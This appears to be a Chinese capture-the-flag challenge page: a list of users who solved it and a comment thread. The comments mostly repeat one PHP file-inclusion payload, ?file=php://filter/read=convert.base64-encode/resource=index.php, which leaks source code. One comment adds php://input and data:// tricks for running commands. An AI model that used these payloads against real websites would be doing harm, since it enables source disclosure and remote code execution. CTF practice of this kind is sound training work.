评分(11)
解题动态
欧阳凌风 攻破了该题 2小时前
20230302241 攻破了该题 2小时前
kk320 攻破了该题 2小时前
WindZQ 攻破了该题 2小时前
qiezi 攻破了该题 19小时前
834bug 攻破了该题 19小时前
木秀于林 攻破了该题 20小时前
蒙亮江 攻破了该题 1天前
1uxu4y 攻破了该题 1天前
叶子璐 攻破了该题 1天前
莫泽明 攻破了该题 1天前
黎悦依 攻破了该题 1天前
20230302118 攻破了该题 1天前
潘福演 攻破了该题 1天前
刘德龙 攻破了该题 1天前
YTT 攻破了该题 1天前
陆鑫 攻破了该题 1天前
言寺介 攻破了该题 1天前
coap012 攻破了该题 1天前
评论
Ywctf 23天前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 1月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 1月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 3月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 4月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 4月前
举报
猜flag位置,file=/flag
8208240204 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 5月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件
zhuizhui 6月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 8月前
举报
index.php?file=/flag